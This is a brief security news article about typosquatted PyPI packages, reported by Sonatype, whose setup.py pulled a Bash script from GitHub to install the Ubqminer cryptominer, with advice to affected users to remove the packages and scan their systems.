Malicious Packages on PyPI Found Stealing Resources for Cryptocurrency Mining
Security firm Sonatype has uncovered a series of malicious packages on the Python Package Index (PyPI). Posted by user 'nedog123', these packages have collectively racked up nearly 5,000 downloads since their April release. The packages, including 'maratlib' and 'matplatlib-plus', are part of a larger issue affecting open-source repositories.
Sonatype, tracking these under sonatype-2021-0722, has found that the packages are typosquats, mimicking legitimate software names to trick users into downloading them. The malicious code, hidden in the setup.py file, runs during installation and downloads a Bash script from GitHub. This script then installs a cryptominer called 'Ubqminer' on affected machines, using their resources to mine cryptocurrency.
The primary target of the attack is 'maratlib', which other malicious packages pull in as a dependency. Sonatype's automated malware detection system, Release Integrity, discovered these counterfeit components. Since 2019, Release Integrity has identified over 12,000 suspicious npm open source packages, highlighting the growing threat of malicious typosquatting.
The cryptocurrency used in the malware is not explicitly identified. Sonatype advises users to be cautious when downloading packages, especially those with similar names to legitimate software. Affected users are urged to remove the malicious packages and scan their systems for any lingering cryptominer activity.
